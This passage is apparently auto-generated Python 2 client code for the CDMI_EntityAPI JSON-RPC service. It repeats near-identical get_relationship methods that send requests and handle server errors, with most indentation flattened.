arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsSuperclassOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsSubclassOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsSubclassOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsTaxonomyOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsTaxonomyOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsInTaxa(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsInTaxa',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsTerminusFor(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsTerminusFor',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasAsTerminus(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasAsTerminus',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsTriggeredBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsTriggeredBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Triggers(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Triggers',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsUsedToBuildTree(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsUsedToBuildTree',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsBuiltFromAlignment(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsBuiltFromAlignment',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Manages(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Manages',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsManagedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsManagedBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_OntologyForSample(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_OntologyForSample',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_SampleHasOntology(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_SampleHasOntology',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_OperatesIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_OperatesIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsUtilizedIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsUtilizedIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_OrdersExperimentalUnit(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_OrdersExperimentalUnit',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsTimepointOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsTimepointOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Overlaps(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Overlaps',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IncludesPartOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IncludesPartOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_ParticipatesAs(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_ParticipatesAs',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsParticipationOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsParticipationOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_PerformedExperiment(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_PerformedExperiment',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_PerformedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_PerformedBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_PersonAnnotatedSample(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_PersonAnnotatedSample',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_SampleAnnotatedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_SampleAnnotatedBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_PlatformWithSamples(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_PlatformWithSamples',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_SampleRunOnPlatform(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_SampleRunOnPlatform',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_ProducedResultsFor(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_ProducedResultsFor',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HadResultsProducedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HadResultsProducedBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_ProtocolForSample(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_ProtocolForSample',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_SampleUsesProtocol(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_SampleUsesProtocol',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Provided(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Provided',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
